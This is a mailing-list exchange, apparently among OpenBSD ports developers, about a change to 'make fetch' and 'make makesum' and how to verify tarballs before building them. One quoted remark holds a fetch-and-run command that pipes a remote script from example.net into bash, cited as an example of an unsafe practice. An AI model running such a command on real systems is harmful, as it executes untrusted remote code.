On Thu, Feb 23, 2017 at 02:48:30PM +0100, Jeremie Courreges-Anglas wrote: > Marc Espie <es...@nerim.net> writes: > > > On Wed, Feb 22, 2017 at 07:37:09PM +0100, Jeremie Courreges-Anglas wrote: > >> I'd like to point out that it harms a process I have as a port user. If > >> projects published signatures for their releases, I want to check them, > >> because I can have a trust relationship with upstream. > > > >> So the process that involves ''make makesum'', verify the signature, > >> ''make makesum'' is now broken. Can I just set _MAKESUM=true in > >> /etc/mk.conf and be sure that I have the same workflow as before? If > >> so, I think this variable should be a documented user setting. > > Your process doesn't make sense. Neither does your suggestion. Where's the > > typo ? > > Ok so let's try to describe this more clearly. What I do is: > - make fetch > - verify the tarball > - make makesum > > This means that by default the new tarball is not trusted by the > infrastructure code, and will refuse to do anything with said tarball > until I do the proper checks. > > I mentioned tarballs signed by upstream, but all tarballs are concerned. > I can verify the content with a diff between the old and new tarballs > before blindly running a build that may involve running untrusted code. > > If you're saying that this process doesn't make sense then I must be > living on another planet. I'm just checking the code I download before > I run it. ''curl http://example.net/install-script | bash'' anyone?
This is not the process you described in the previous email. Read attentively. Notice you said make makesum twice ? > With the changes you made, let's see what I get when I try to update > a port: > > ritchie /usr/ports/net/libpsl$ make fetch > ===> Checking files for libpsl-0.17.0 > >> Fetch > >> https://github.com/rockdaboot/libpsl//releases/download/libpsl-0.17.0/libpsl-0.17.0.tar.gz > 39958274-dbf8-11e6-9ef... 100% > |*******************************************************************************************************| > 553 KB 00:04 > >> No size recorded for libpsl-0.17.0.tar.gz > *** Error 1 in . (/usr/ports/infrastructure/mk/bsd.port.mk:2851 > '/d/distfiles/libpsl-0.17.0.tar.gz': @lock=libpsl-0.17.0.tar.gz.dist; > /usr/b...) > *** Error 1 in . (/usr/ports/infrastructure/mk/bsd.port.mk:2214 > '_internal-fetch') > *** Error 1 in /usr/ports/net/libpsl > (/usr/ports/infrastructure/mk/bsd.port.mk:2365 'fetch') > ritchie /usr/ports/net/libpsl$ ls /usr/ports/distfiles/libpsl-0.17.0.tar.gz > ls: /usr/ports/distfiles/libpsl-0.17.0.tar.gz: No such file or directory Well, I would do "make patch", then update the Makefile, then "make makesum", "make patch", diff the contents of the old and new WRKDIST before running anything, and kill distinfo if I have a doubt. It's slightly different from your previous process, but I fail to see any disadvantage to it. > I don't understand what you mean. Previously I could not use distfiles > without checksum, the infrastructure would error out, so what exactly > are you trying to avoid here? But previously you could download stuff with fetch that wasn't referenced in distinfo without a conscious decision asking for "make makesum". Yes, "make extract' wouldn't deal with it, but the file would still be there and extractible manually. It is harder to do now.
